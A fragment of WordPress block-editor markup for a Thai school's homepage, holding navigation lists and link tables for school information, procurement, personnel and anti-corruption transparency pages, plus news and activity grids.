{\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\